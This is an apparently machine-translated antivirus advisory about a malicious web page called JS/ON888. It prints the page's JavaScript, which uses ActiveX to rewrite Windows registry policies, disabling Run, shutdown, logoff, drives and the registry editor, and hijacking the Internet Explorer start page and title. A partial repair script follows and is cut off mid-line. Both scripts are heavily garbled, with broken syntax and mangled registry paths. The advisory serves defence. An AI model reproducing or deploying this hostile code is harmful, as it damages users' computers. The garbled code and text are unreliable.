The National Anti-Virus Emergency Treatment Center Association Beijing Jiangmin Company's anti-virus emergency team recently monitored people in China, and the people who have a beautiful attractive website "Wan" in the interconnection network, which is actually a malicious "trap" Some people can't stand the temptation. It only uses the mouse to gently, the computer is immediately paralyzed, which is another malicious website that uses Java's latest technology to destroy. Beijing Jiangmin Company reminds users to pay attention to the online users, encounter the website with on888.xxx, please do not click, and turn on the KVW3000 virus real-time monitoring firewall to prevent killing. The virus technology features: JS / ON888 is a new ActiveX web file containing harmful code, which causes damage to computer users by a network address, and its destruction characteristics are as follows: (1) Users cannot normalize Windows DOS functionality Program; (2) Users cannot properly exit Windows, (3) The "Close System" on the Start menu, "Run" and other columns are masked, prevent users from starting with DOS mode, turn off the DOS command, turn off the regedit command, etc.. (4) Add the network address containing the harmful web code in the homepage and favorites of the IE browser. The specific expression is: A: Network address is: www.on888.xxx.xxx.com; b: Automatically add "Wanhua" shortcut to "Favorites" in IE, the network address is: "http: //96xx.xxx.com "; below, the author provides the analysis of the virus code, the code to repair it: The reason why the virus is named JS / XXXXX, because it is using malicious JavaScript code in the page : Let us see how the HTML page modifies the IE title: First, use the JavaScript code to modify HKLM / SOFTWARE / Microsoft / Internet Explorer / Main / and HKCU / Software / Microsoft / Internet Explorer / Main / MAIN / Window Title's key value; and modify many of the user's IE settings, such as eliminating Run pressing, eliminating the shutdown button, eliminate the logout button, hide the desktop, hide the drive letter, prohibit the registry, etc.
The following is the code of this virus: Document.write (""); function addfavlnk (LOC, DISPNAME, SiteURL) {var shor = shl.createshortcut (LOC "//" DISPNAME ". URL"); shor.targetPath = SiteURL; Shor.Save ();} function f () {Try {ActiveX Initialization A1 = Document.Applets [0]; A1.SETCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); A1.CreateInstance (); SHL = a1.GetObject (); A1.SETCLSID ("{0D43FE01-F093-11CF-8940-00A0C9054228}"); A1.CreateInstance (); fso = a1.GetObject (); a1.setClsid ("{ F935DC26-1CF0-11D0-ADB9-00C04FD58A0B} "); A1.CreateInstance (); net = a1.GetObject (); try {if (documents .cookies.indexof (" chg ") == -1) {// SHL .RegWrite ("HKCU // Internet Explorer // Main // Start Page", "http://com.6to23.com/"); var expdate = new date ((New Date ()) .gettime () (1)); Documents .Cookies = "chG = general; expires =" expdate.togmtstring () "; path = /;" shl.regwrite ("HKCU // Software // Microsoft Windows // CurrentVersion // Policies // Explorer // Norun ", 01," REG_BINARY "); // Eliminate Run press New Shl.Regwrite (" HKCU // Software // Micro Soft // windows // currentversion // policies // Explorer // Noclose ", 01," reg_binary "); // Error closing button Shl.Regwrite (" HKCU // Software // Microsoft // Windows // CurrentVersion / / Policies // Explorer // Nologoff ", 01," REG_BINARY "); // Eliminate the logout button Shl.Regwrite (" HKCU // Software // CurrentVersion // Policies // Explorer // Nodrives "," 63000000 "," REG_DWORD "); // Hidden Drive SHL.REGWRITE (" HKCU // Software // Microsoft // WINDWARE // CurrentVersion // POLICIES // System // DisableregISTRYTOOLS "," 00000001 "," REG_DWORD ");
// Prohibit Registry SHL.REGWRITE ("HKCU // Software // Microsoft // WINDWARE / / // DISABED", "00000001", "REG_DWORD"); SHL.REGWRITE ("HKCU / / Software // Microsoft // Windows // CurrentVersion // Policies // WinoldApp // NoreAlMode "," 00000001 "," REG_DWORD "); shl.Regwrite (" HKLM // Software // Microsoft // Windows // CurrentVersion / / Winlogon // LegalNoticeCaption, "Your computer has been http://www.cnhack.org/ optimization:)") ")"); shl.regwrite ("HKLM // Software // Microsoft // Windows // CurrentVersion // Winlogon // legalnoticetext "," Your computer has been http://www.cnhack.org/ optimization:) ")") ")") "); // Setting boot prompt shl.regWrite (" HKLM // Software // Microsoft // Internet Explorer ////// Main // window title "," new title ★ http://com.6to23.com/ & http://www.cnhack.org/ "); shl.regwrite (" HKCU // Software // Microsoft // Internet Explorer // Main // WINDOW TITLE "," New Title ★ http://com.6to23.com/ & http://www.cnhack.org/ "); // Set IE Title Var Expdate = New Date ((NEW DATE ()). getTime () (1)); Documents .Cookies = "chg = general; expires =" " "; path = /; "}} catch = /;"}} catch (e) { }}} catch (e) {}} fu NCTION init () {setTimeout ("f ()", 1000);} init (); The following is the key value for repairing each similar JavaScript code: Document.write (""); Function AddFavlnk (LOC, DISPNAME , SiteURL) {Var Shor = shl.createshortcut (LOC "//" DISPNAME ". URL"); Shor.TargetPath = SiteURL; shor.save ();} function f () {Try {ActiveX Initialization A1 = Document.Applets [0]; A1.SETCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); A1.CreateInstance (); shl = a1.GetObject (); a1.setclsid ("{0D43FE01-F093- 11CF-8940-00A0C9054228} ");
A1.createInstance (); fso = a1.GetObject (); A1.SETCLSID ("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); A1.CreateInstance (); net = a1.getObject (); try {ife (Documents .Cookies.Indexof ("CHG") == -1) {//shl.regWrite ("HKCU // Internet Explorer // Main // Start Page", "http: // COM .6to23.com / "); var expdate = new date ((new date ()). GetTime () (1)); Documents .Cookies =" chg = general; expires = " expdate.togmtstring ()" Path = /; "SHL.Regwrite (" HKCU // Software // Microsoft // Windows // CurrentVersion // POLICIES ///// Norun ", 00," REG_BINARY "); // Fix the RUN Press New SHL. RegWrite ("HKCU // Software // Microsoft // WINDOWARE // CurrentVersion // POLICIES //////// Noclose", 00, "REG_BINARY"); // Repair Close button Shl.Regwrite ("HKCU // Software / / Microsoft // Windows // CurrentVersion // Policies // Explorer // Nologoff ", 00," Reg_binary "); // Fix the DF button Shl.RegWrite (" HKCU // Software // Microsoft // Windows // CurrentVersion // ("00000000", "REG_DWORD"); // cancel hidden disk shl.regwrite ("HKCU // Software // Microsoft // Windows // CurrentVersion // POLICIES // System // DisableregISTRYTOLS "," 00000000 "," REG_DWORD "); // Cancel the prohibition registry shl.RegWrite (" HKCU // Software // Microsoft // WINDWARE // CurrentVersion // Policies // WinoldApp // Disabled, "00000001", "REG_DWORD"); shl.regwrite ("HKCU // Software // Microsoft // POLICIES // WinoldApp // NoreAlMode", "00000001", "REG_DWORD "); Shl.regwrite (" HKLM // Windware // CurrentVersion // Winlogon // LegalnoticeCaption "," "); shl.regwrite ("
